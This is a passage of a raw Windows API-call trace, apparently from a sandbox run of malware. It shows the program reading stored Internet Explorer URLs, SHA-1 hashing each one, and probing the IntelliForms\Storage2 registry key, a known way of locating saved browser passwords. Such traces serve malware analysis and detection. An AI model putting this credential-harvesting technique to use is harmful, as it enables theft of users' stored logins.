returned 0x5d67840 [0249.423] lstrcpyW (in: lpString1=0x5d67840, lpString2="A5B45C3917E9D1CF64B60AC2838BC7897AB8" | out: lpString1="A5B45C3917E9D1CF64B60AC2838BC7897AB8") returned="A5B45C3917E9D1CF64B60AC2838BC7897AB8" [0249.423] lstrcatW (in: lpString1="A5B45C3917E9D1CF64B60AC2838BC7897AB8", lpString2="35" | out: lpString1="A5B45C3917E9D1CF64B60AC2838BC7897AB835") returned="A5B45C3917E9D1CF64B60AC2838BC7897AB835" [0249.423] LocalFree (hMem=0x5d667a0) returned 0x0 [0249.423] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="4F") returned 2 [0249.423] lstrlenW (lpString="A5B45C3917E9D1CF64B60AC2838BC7897AB835") returned 38 [0249.423] lstrlenW (lpString="4F") returned 2 [0249.423] LocalAlloc (uFlags=0x40, uBytes=0xd2) returned 0x5d66ce0 [0249.423] lstrcpyW (in: lpString1=0x5d66ce0, lpString2="A5B45C3917E9D1CF64B60AC2838BC7897AB835" | out: lpString1="A5B45C3917E9D1CF64B60AC2838BC7897AB835") returned="A5B45C3917E9D1CF64B60AC2838BC7897AB835" [0249.424] lstrcatW (in: lpString1="A5B45C3917E9D1CF64B60AC2838BC7897AB835", lpString2="4F" | out: lpString1="A5B45C3917E9D1CF64B60AC2838BC7897AB8354F") returned="A5B45C3917E9D1CF64B60AC2838BC7897AB8354F" [0249.424] LocalFree (hMem=0x5d67840) returned 0x0 [0249.424] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="88") returned 2 [0249.424] lstrlenW (lpString="A5B45C3917E9D1CF64B60AC2838BC7897AB8354F") returned 40 [0249.424] lstrlenW (lpString="88") returned 2 [0249.424] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x5d67840 [0249.424] lstrcpyW (in: lpString1=0x5d67840, lpString2="A5B45C3917E9D1CF64B60AC2838BC7897AB8354F" | out: lpString1="A5B45C3917E9D1CF64B60AC2838BC7897AB8354F") returned="A5B45C3917E9D1CF64B60AC2838BC7897AB8354F" [0249.424] lstrcatW (in: lpString1="A5B45C3917E9D1CF64B60AC2838BC7897AB8354F", lpString2="88" | out: lpString1="A5B45C3917E9D1CF64B60AC2838BC7897AB8354F88") returned="A5B45C3917E9D1CF64B60AC2838BC7897AB8354F88" [0249.424] LocalFree (hMem=0x5d66ce0) returned 0x0 [0249.424] CryptDestroyHash (hHash=0x5d9e240) returned 1 [0249.424] CryptReleaseContext (hProv=0x5d37f10, dwFlags=0x0) returned 1 [0249.424] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c4f360 | out: phkResult=0x1c4f360*=0x0) returned 0x2 [0249.424] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f300 | out: phkResult=0x1c4f300*=0x0) returned 0x2 [0249.424] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20119, phkResult=0x1c4f2a0 | out: phkResult=0x1c4f2a0*=0x0) returned 0x2 [0249.424] LocalFree (hMem=0x5d67840) returned 0x0 [0249.424] RegEnumValueW (in: hKey=0x94c, dwIndex=0xf, lpValueName=0x1c4f510, lpcchValueName=0x1c4f768, lpReserved=0x0, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760 | out: lpValueName="url8", lpcchValueName=0x1c4f768, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760) returned 0x0 [0249.424] StrStrIW (lpFirst="caijing.com.cn", lpSrch="?") returned 0x0 [0249.424] StrStrIW (lpFirst="caijing.com.cn", lpSrch="http://") returned 0x0 [0249.424] CryptAcquireContextW (in: phProv=0x1c4f3e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1c4f3e0*=0x5d3a010) returned 1 [0249.425] CryptCreateHash (in: hProv=0x5d3a010, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x1c4f3d8 | out: phHash=0x1c4f3d8) returned 1 [0249.425] lstrlenW (lpString="caijing.com.cn") returned 14 [0249.425] CryptHashData (hHash=0x5d9db40, pbData=0x43ed4e0, dwDataLen=0x1e, dwFlags=0x0) returned 1 [0249.425] CryptGetHashParam (in: hHash=0x5d9db40, dwParam=0x2, pbData=0x1c4f410, pdwDataLen=0x1c4f4a8, dwFlags=0x0 | out: pbData=0x1c4f410, pdwDataLen=0x1c4f4a8) returned 1 [0249.425] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="E2") returned 2 [0249.425] lstrlenW (lpString="") returned 0 [0249.425] lstrlenW (lpString="E2") returned 2 [0249.425] LocalAlloc (uFlags=0x40, uBytes=0x86) returned 0xd1b3f50 [0249.425] lstrcpyW (in: lpString1=0xd1b3f50, lpString2="" | out: lpString1="") returned="" [0249.425] lstrcatW (in: lpString1="", lpString2="E2" | out: lpString1="E2") returned="E2" [0249.425] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="5C") returned 2 [0249.425] lstrlenW (lpString="E2") returned 2 [0249.425] lstrlenW (lpString="5C") returned 2 [0249.425] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x5d33db0 [0249.425] lstrcpyW (in: lpString1=0x5d33db0, lpString2="E2" | out: lpString1="E2") returned="E2" [0249.425] lstrcatW (in: lpString1="E2", lpString2="5C" | out: lpString1="E25C") returned="E25C" [0249.425] LocalFree (hMem=0xd1b3f50) returned 0x0 [0249.425] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="69") returned 2 [0249.425] lstrlenW (lpString="E25C") returned 4 [0249.425] lstrlenW (lpString="69") returned 2 [0249.425] LocalAlloc (uFlags=0x40, uBytes=0x8e) returned 0x5d34170 [0249.425] lstrcpyW (in: lpString1=0x5d34170, lpString2="E25C" | out: lpString1="E25C") returned="E25C" [0249.425] lstrcatW (in: lpString1="E25C", lpString2="69" | out: lpString1="E25C69") returned="E25C69" [0249.425] LocalFree (hMem=0x5d33db0) returned 0x0 [0249.425] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="95") returned 2 [0249.426] lstrlenW (lpString="E25C69") returned 6 [0249.426] lstrlenW (lpString="95") returned 2 [0249.426] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x5d33db0 [0249.426] lstrcpyW (in: lpString1=0x5d33db0, lpString2="E25C69" | out: lpString1="E25C69") returned="E25C69" [0249.426] lstrcatW (in: lpString1="E25C69", lpString2="95" | out: lpString1="E25C6995") returned="E25C6995" [0249.426] LocalFree (hMem=0x5d34170) returned 0x0 [0249.426] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="F2") returned 2 [0249.426] lstrlenW (lpString="E25C6995") returned 8 [0249.426] lstrlenW (lpString="F2") returned 2 [0249.426] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x5d34170 [0249.426] lstrcpyW (in: lpString1=0x5d34170, lpString2="E25C6995" | out: lpString1="E25C6995") returned="E25C6995" [0249.426] lstrcatW (in: lpString1="E25C6995", lpString2="F2" | out: lpString1="E25C6995F2") returned="E25C6995F2" [0249.426] LocalFree (hMem=0x5d33db0) returned 0x0 [0249.426] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="4C") returned 2 [0249.426] lstrlenW (lpString="E25C6995F2") returned 10 [0249.426] lstrlenW (lpString="4C") returned 2 [0249.426] LocalAlloc (uFlags=0x40, uBytes=0x9a) returned 0xd1cfaa0 [0249.426] lstrcpyW (in: lpString1=0xd1cfaa0, lpString2="E25C6995F2" | out: lpString1="E25C6995F2") returned="E25C6995F2" [0249.426] lstrcatW (in: lpString1="E25C6995F2", lpString2="4C" | out: lpString1="E25C6995F24C") returned="E25C6995F24C" [0249.426] LocalFree (hMem=0x5d34170) returned 0x0 [0249.426] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="D8") returned 2 [0249.426] lstrlenW (lpString="E25C6995F24C") returned 12 [0249.426] lstrlenW (lpString="D8") returned 2 [0249.426] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0xd1d1200 [0249.426] lstrcpyW (in: lpString1=0xd1d1200, lpString2="E25C6995F24C" | out: lpString1="E25C6995F24C") returned="E25C6995F24C" [0249.426] lstrcatW (in: lpString1="E25C6995F24C", lpString2="D8" | out: lpString1="E25C6995F24CD8") returned="E25C6995F24CD8" [0249.426] LocalFree (hMem=0xd1cfaa0) returned 0x0 [0249.426] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="A8") returned 2 [0249.426] lstrlenW (lpString="E25C6995F24CD8") returned 14 [0249.426] lstrlenW (lpString="A8") returned 2 [0249.426] LocalAlloc (uFlags=0x40, uBytes=0xa2) returned 0xd1d0020 [0249.426] lstrcpyW (in: lpString1=0xd1d0020, lpString2="E25C6995F24CD8" | out: lpString1="E25C6995F24CD8") returned="E25C6995F24CD8" [0249.426] lstrcatW (in: lpString1="E25C6995F24CD8", lpString2="A8" | out: lpString1="E25C6995F24CD8A8") returned="E25C6995F24CD8A8" [0249.427] LocalFree (hMem=0xd1d1200) returned 0x0 [0249.427] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="09") returned 2 [0249.427] lstrlenW (lpString="E25C6995F24CD8A8") returned 16 [0249.427] lstrlenW (lpString="09") returned 2 [0249.427] LocalAlloc (uFlags=0x40, uBytes=0xa6) returned 0xd1d0de0 [0249.427] lstrcpyW (in: lpString1=0xd1d0de0, lpString2="E25C6995F24CD8A8" | out: lpString1="E25C6995F24CD8A8") returned="E25C6995F24CD8A8" [0249.427] lstrcatW (in: lpString1="E25C6995F24CD8A8", lpString2="09" | out: lpString1="E25C6995F24CD8A809") returned="E25C6995F24CD8A809" [0249.427] LocalFree (hMem=0xd1d0020) returned 0x0 [0249.427] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="8B") returned 2 [0249.427] lstrlenW (lpString="E25C6995F24CD8A809") returned 18 [0249.427] lstrlenW (lpString="8B") returned 2 [0249.427] LocalAlloc (uFlags=0x40, uBytes=0xaa) returned 0xd216c70 [0249.427] lstrcpyW (in: lpString1=0xd216c70, lpString2="E25C6995F24CD8A809" | out: lpString1="E25C6995F24CD8A809") returned="E25C6995F24CD8A809" [0249.427] lstrcatW (in: lpString1="E25C6995F24CD8A809", lpString2="8B" | out: lpString1="E25C6995F24CD8A8098B") returned="E25C6995F24CD8A8098B" [0249.427] LocalFree (hMem=0xd1d0de0) returned 0x0 [0249.427] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="A4") returned 2 [0249.427] lstrlenW (lpString="E25C6995F24CD8A8098B") returned 20 [0249.427] lstrlenW (lpString="A4") returned 2 [0249.427] LocalAlloc (uFlags=0x40, uBytes=0xae) returned 0xd2167f0 [0249.427] lstrcpyW (in: lpString1=0xd2167f0, lpString2="E25C6995F24CD8A8098B" | out: lpString1="E25C6995F24CD8A8098B") returned="E25C6995F24CD8A8098B" [0249.427] lstrcatW (in: lpString1="E25C6995F24CD8A8098B", lpString2="A4" | out: lpString1="E25C6995F24CD8A8098BA4") returned="E25C6995F24CD8A8098BA4" [0249.427] LocalFree (hMem=0xd216c70) returned 0x0 [0249.427] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="21") returned 2 [0249.427] lstrlenW (lpString="E25C6995F24CD8A8098BA4") returned 22 [0249.427] lstrlenW (lpString="21") returned 2 [0249.427] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0xd217c30 [0249.427] lstrcpyW (in: lpString1=0xd217c30, lpString2="E25C6995F24CD8A8098BA4" | out: lpString1="E25C6995F24CD8A8098BA4") returned="E25C6995F24CD8A8098BA4" [0249.427] lstrcatW (in: lpString1="E25C6995F24CD8A8098BA4", lpString2="21" | out: lpString1="E25C6995F24CD8A8098BA421") returned="E25C6995F24CD8A8098BA421" [0249.427] LocalFree (hMem=0xd2167f0) returned 0x0 [0249.427] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="38") returned 2 [0249.427] lstrlenW (lpString="E25C6995F24CD8A8098BA421") returned 24 [0249.427] lstrlenW (lpString="38") returned 2 [0249.427] LocalAlloc (uFlags=0x40, uBytes=0xb6) returned 0xd217570 [0249.427] lstrcpyW (in: lpString1=0xd217570, lpString2="E25C6995F24CD8A8098BA421" | out: lpString1="E25C6995F24CD8A8098BA421") returned="E25C6995F24CD8A8098BA421" [0249.427] lstrcatW (in: lpString1="E25C6995F24CD8A8098BA421", lpString2="38" | out: lpString1="E25C6995F24CD8A8098BA42138") returned="E25C6995F24CD8A8098BA42138" [0249.427] LocalFree (hMem=0xd217c30) returned 0x0 [0249.427] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="B6") returned 2 [0249.427] lstrlenW (lpString="E25C6995F24CD8A8098BA42138") returned 26 [0249.427] lstrlenW (lpString="B6") returned 2 [0249.428] LocalAlloc (uFlags=0x40, uBytes=0xba) returned 0xd214db0 [0249.428] lstrcpyW (in: lpString1=0xd214db0, lpString2="E25C6995F24CD8A8098BA42138" | out: lpString1="E25C6995F24CD8A8098BA42138") returned="E25C6995F24CD8A8098BA42138" [0249.428] lstrcatW (in: lpString1="E25C6995F24CD8A8098BA42138", lpString2="B6" | out: lpString1="E25C6995F24CD8A8098BA42138B6") returned="E25C6995F24CD8A8098BA42138B6" [0249.428] LocalFree (hMem=0xd217570) returned 0x0 [0249.428] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="54") returned 2 [0249.428] lstrlenW (lpString="E25C6995F24CD8A8098BA42138B6") returned 28 [0249.428] lstrlenW (lpString="54") returned 2 [0249.428] LocalAlloc (uFlags=0x40, uBytes=0xbe) returned 0xd216540 [0249.428] lstrcpyW (in: lpString1=0xd216540, lpString2="E25C6995F24CD8A8098BA42138B6" | out: lpString1="E25C6995F24CD8A8098BA42138B6") returned="E25C6995F24CD8A8098BA42138B6" [0249.428] lstrcatW (in: lpString1="E25C6995F24CD8A8098BA42138B6", lpString2="54" | out: lpString1="E25C6995F24CD8A8098BA42138B654") returned="E25C6995F24CD8A8098BA42138B654" [0249.428] LocalFree (hMem=0xd214db0) returned 0x0 [0249.428] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="02") returned 2 [0249.428] lstrlenW (lpString="E25C6995F24CD8A8098BA42138B654") returned 30 [0249.428] lstrlenW (lpString="02") returned 2 [0249.428] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0xd214660 [0249.428] lstrcpyW (in: lpString1=0xd214660, lpString2="E25C6995F24CD8A8098BA42138B654" | out: lpString1="E25C6995F24CD8A8098BA42138B654") returned="E25C6995F24CD8A8098BA42138B654" [0249.428] lstrcatW (in: lpString1="E25C6995F24CD8A8098BA42138B654", lpString2="02" | out: lpString1="E25C6995F24CD8A8098BA42138B65402") returned="E25C6995F24CD8A8098BA42138B65402" [0249.428] LocalFree (hMem=0xd216540) returned 0x0 [0249.428] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="02") returned 2 [0249.428] lstrlenW (lpString="E25C6995F24CD8A8098BA42138B65402") returned 32 [0249.428] lstrlenW (lpString="02") returned 2 [0249.428] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0xd214db0 [0249.428] lstrcpyW (in: lpString1=0xd214db0, lpString2="E25C6995F24CD8A8098BA42138B65402" | out: lpString1="E25C6995F24CD8A8098BA42138B65402") returned="E25C6995F24CD8A8098BA42138B65402" [0249.428] lstrcatW (in: lpString1="E25C6995F24CD8A8098BA42138B65402", lpString2="02" | out: lpString1="E25C6995F24CD8A8098BA42138B6540202") returned="E25C6995F24CD8A8098BA42138B6540202" [0249.428] LocalFree (hMem=0xd214660) returned 0x0 [0249.428] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="41") returned 2 [0249.428] lstrlenW (lpString="E25C6995F24CD8A8098BA42138B6540202") returned 34 [0249.428] lstrlenW (lpString="41") returned 2 [0249.428] LocalAlloc (uFlags=0x40, uBytes=0xca) returned 0x5d667a0 [0249.428] lstrcpyW (in: lpString1=0x5d667a0, lpString2="E25C6995F24CD8A8098BA42138B6540202" | out: lpString1="E25C6995F24CD8A8098BA42138B6540202") returned="E25C6995F24CD8A8098BA42138B6540202" [0249.428] lstrcatW (in: lpString1="E25C6995F24CD8A8098BA42138B6540202", lpString2="41" | out: lpString1="E25C6995F24CD8A8098BA42138B654020241") returned="E25C6995F24CD8A8098BA42138B654020241" [0249.428] LocalFree (hMem=0xd214db0) returned 0x0 [0249.429] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="CA") returned 2 [0249.429] lstrlenW (lpString="E25C6995F24CD8A8098BA42138B654020241") returned 36 [0249.429] lstrlenW (lpString="CA") returned 2 [0249.429] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x5d66960 [0249.429] lstrcpyW (in: lpString1=0x5d66960, lpString2="E25C6995F24CD8A8098BA42138B654020241" | out: lpString1="E25C6995F24CD8A8098BA42138B654020241") returned="E25C6995F24CD8A8098BA42138B654020241" [0249.429] lstrcatW (in: lpString1="E25C6995F24CD8A8098BA42138B654020241", lpString2="CA" | out: lpString1="E25C6995F24CD8A8098BA42138B654020241CA") returned="E25C6995F24CD8A8098BA42138B654020241CA" [0249.429] LocalFree (hMem=0x5d667a0) returned 0x0 [0249.429] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="6D") returned 2 [0249.429] lstrlenW (lpString="E25C6995F24CD8A8098BA42138B654020241CA") returned 38 [0249.429] lstrlenW (lpString="6D") returned 2 [0249.429] LocalAlloc (uFlags=0x40, uBytes=0xd2) returned 0x5d67e60 [0249.430] lstrcpyW (in: lpString1=0x5d67e60, lpString2="E25C6995F24CD8A8098BA42138B654020241CA" | out: lpString1="E25C6995F24CD8A8098BA42138B654020241CA") returned="E25C6995F24CD8A8098BA42138B654020241CA" [0249.430] lstrcatW (in: lpString1="E25C6995F24CD8A8098BA42138B654020241CA", lpString2="6D" | out: lpString1="E25C6995F24CD8A8098BA42138B654020241CA6D") returned="E25C6995F24CD8A8098BA42138B654020241CA6D" [0249.430] LocalFree (hMem=0x5d66960) returned 0x0 [0249.430] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="11") returned 2 [0249.430] lstrlenW (lpString="E25C6995F24CD8A8098BA42138B654020241CA6D") returned 40 [0249.430] lstrlenW (lpString="11") returned 2 [0249.430] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x5d67840 [0249.430] lstrcpyW (in: lpString1=0x5d67840, lpString2="E25C6995F24CD8A8098BA42138B654020241CA6D" | out: lpString1="E25C6995F24CD8A8098BA42138B654020241CA6D") returned="E25C6995F24CD8A8098BA42138B654020241CA6D" [0249.430] lstrcatW (in: lpString1="E25C6995F24CD8A8098BA42138B654020241CA6D", lpString2="11" | out: lpString1="E25C6995F24CD8A8098BA42138B654020241CA6D11") returned="E25C6995F24CD8A8098BA42138B654020241CA6D11" [0249.430] LocalFree (hMem=0x5d67e60) returned 0x0 [0249.430] CryptDestroyHash (hHash=0x5d9db40) returned 1 [0249.430] CryptReleaseContext (hProv=0x5d3a010, dwFlags=0x0) returned 1 [0249.430] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c4f360 | out: phkResult=0x1c4f360*=0x0) returned 0x2 [0249.430] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f300 | out: phkResult=0x1c4f300*=0x0) returned 0x2 [0249.430] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20119, phkResult=0x1c4f2a0 | out: phkResult=0x1c4f2a0*=0x0) returned 0x2 [0249.430] LocalFree (hMem=0x5d67840) returned 0x0 [0249.430] RegEnumValueW (in: hKey=0x94c, dwIndex=0x10, lpValueName=0x1c4f510, lpcchValueName=0x1c4f768, lpReserved=0x0, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760 | out: lpValueName="url7", lpcchValueName=0x1c4f768, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760) returned 0x0 [0249.430] StrStrIW (lpFirst="linkedin.com", lpSrch="?") returned 0x0 [0249.430] StrStrIW (lpFirst="linkedin.com", lpSrch="http://") returned 0x0 [0249.430] CryptAcquireContextW (in: phProv=0x1c4f3e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1c4f3e0*=0x5d39710) returned 1 [0249.430] CryptCreateHash (in: hProv=0x5d39710, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x1c4f3d8 | out: phHash=0x1c4f3d8) returned 1 [0249.430] lstrlenW (lpString="linkedin.com") returned 12 [0249.430] CryptHashData (hHash=0x5d9d8a0, pbData=0x43ed4e0, dwDataLen=0x1a, dwFlags=0x0) returned 1 [0249.430] CryptGetHashParam (in: hHash=0x5d9d8a0, dwParam=0x2, pbData=0x1c4f410, pdwDataLen=0x1c4f4a8, dwFlags=0x0 | out: pbData=0x1c4f410, pdwDataLen=0x1c4f4a8) returned 1 [0249.430] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="B2") returned 2 [0249.430] lstrlenW (lpString="") returned 0 [0249.431] lstrlenW (lpString="B2") returned 2 [0249.431] LocalAlloc (uFlags=0x40, uBytes=0x86) returned 0xd1b3ad0 [0249.431] lstrcpyW (in: lpString1=0xd1b3ad0, lpString2="" | out: lpString1="") returned="" [0249.431] lstrcatW (in: lpString1="", lpString2="B2" | out: lpString1="B2") returned="B2" [0249.431] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="F3") returned 2 [0249.431] lstrlenW (lpString="B2") returned 2 [0249.431] lstrlenW (lpString="F3") returned 2 [0249.431] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x5d33db0 [0249.431] lstrcpyW (in: lpString1=0x5d33db0, lpString2="B2" | out: lpString1="B2") returned="B2" [0249.431] lstrcatW (in: lpString1="B2", lpString2="F3" | out: lpString1="B2F3") returned="B2F3" [0249.431] LocalFree (hMem=0xd1b3ad0) returned 0x0 [0249.431] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="00") returned 2 [0249.431] lstrlenW (lpString="B2F3") returned 4 [0249.431] lstrlenW (lpString="00") returned 2 [0249.431] LocalAlloc (uFlags=0x40, uBytes=0x8e) returned 0x5d34170 [0249.431] lstrcpyW (in: lpString1=0x5d34170, lpString2="B2F3" | out: lpString1="B2F3") returned="B2F3" [0249.431] lstrcatW (in: lpString1="B2F3", lpString2="00" | out: lpString1="B2F300") returned="B2F300" [0249.431] LocalFree (hMem=0x5d33db0) returned 0x0 [0249.431] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="85") returned 2 [0249.431] lstrlenW (lpString="B2F300") returned 6 [0249.431] lstrlenW (lpString="85") returned 2 [0249.431] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x5d33db0 [0249.431] lstrcpyW (in: lpString1=0x5d33db0, lpString2="B2F300" | out: lpString1="B2F300") returned="B2F300" [0249.431] lstrcatW (in: lpString1="B2F300", lpString2="85" | out: lpString1="B2F30085") returned="B2F30085" [0249.431] LocalFree (hMem=0x5d34170) returned 0x0 [0249.431] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="B1") returned 2 [0249.432] lstrlenW (lpString="B2F30085") returned 8 [0249.432] lstrlenW (lpString="B1") returned 2 [0249.432] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x5d34170 [0249.432] lstrcpyW (in: lpString1=0x5d34170, lpString2="B2F30085" | out: lpString1="B2F30085") returned="B2F30085" [0249.432] lstrcatW (in: lpString1="B2F30085", lpString2="B1" | out: lpString1="B2F30085B1") returned="B2F30085B1" [0249.432] LocalFree (hMem=0x5d33db0) returned 0x0 [0249.432] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="A0") returned 2 [0249.432] lstrlenW (lpString="B2F30085B1") returned 10 [0249.432] lstrlenW (lpString="A0") returned 2 [0249.432] LocalAlloc (uFlags=0x40, uBytes=0x9a) returned 0xd1d0de0 [0249.432] lstrcpyW (in: lpString1=0xd1d0de0, lpString2="B2F30085B1" | out: lpString1="B2F30085B1") returned="B2F30085B1" [0249.432] lstrcatW (in: lpString1="B2F30085B1", lpString2="A0" | out: lpString1="B2F30085B1A0") returned="B2F30085B1A0" [0249.432] LocalFree (hMem=0x5d34170) returned 0x0 [0249.432] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="B7") returned 2 [0249.432] lstrlenW (lpString="B2F30085B1A0") returned 12 [0249.432] lstrlenW (lpString="B7") returned 2 [0249.433] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0xd1d1410 [0249.433] lstrcpyW (in: lpString1=0xd1d1410, lpString2="B2F30085B1A0" | out: lpString1="B2F30085B1A0") returned="B2F30085B1A0" [0249.433] lstrcatW (in: lpString1="B2F30085B1A0", lpString2="B7" | out: lpString1="B2F30085B1A0B7") returned="B2F30085B1A0B7" [0249.433] LocalFree (hMem=0xd1d0de0) returned 0x0 [0249.433] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="9D") returned 2 [0249.433] lstrlenW (lpString="B2F30085B1A0B7") returned 14 [0249.433] lstrlenW (lpString="9D") returned 2 [0249.433] LocalAlloc (uFlags=0x40, uBytes=0xa2) returned 0xd1cf940 [0249.433] lstrcpyW (in: lpString1=0xd1cf940, lpString2="B2F30085B1A0B7" | out: lpString1="B2F30085B1A0B7") returned="B2F30085B1A0B7" [0249.433] lstrcatW (in: lpString1="B2F30085B1A0B7", lpString2="9D" | out: lpString1="B2F30085B1A0B79D") returned="B2F30085B1A0B79D" [0249.433] LocalFree (hMem=0xd1d1410) returned 0x0 [0249.433] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="31") returned 2 [0249.433] lstrlenW (lpString="B2F30085B1A0B79D") returned 16 [0249.433] lstrlenW (lpString="31") returned 2 [0249.433] LocalAlloc (uFlags=0x40, uBytes=0xa6) returned 0xd1d0860 [0249.433] lstrcpyW (in: lpString1=0xd1d0860, lpString2="B2F30085B1A0B79D" | out: lpString1="B2F30085B1A0B79D") returned="B2F30085B1A0B79D" [0249.433] lstrcatW (in: lpString1="B2F30085B1A0B79D", lpString2="31" | out: lpString1="B2F30085B1A0B79D31") returned="B2F30085B1A0B79D31" [0249.433] LocalFree (hMem=0xd1cf940) returned 0x0 [0249.433] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="77") returned 2 [0249.433] lstrlenW (lpString="B2F30085B1A0B79D31") returned 18 [0249.433] lstrlenW (lpString="77") returned 2 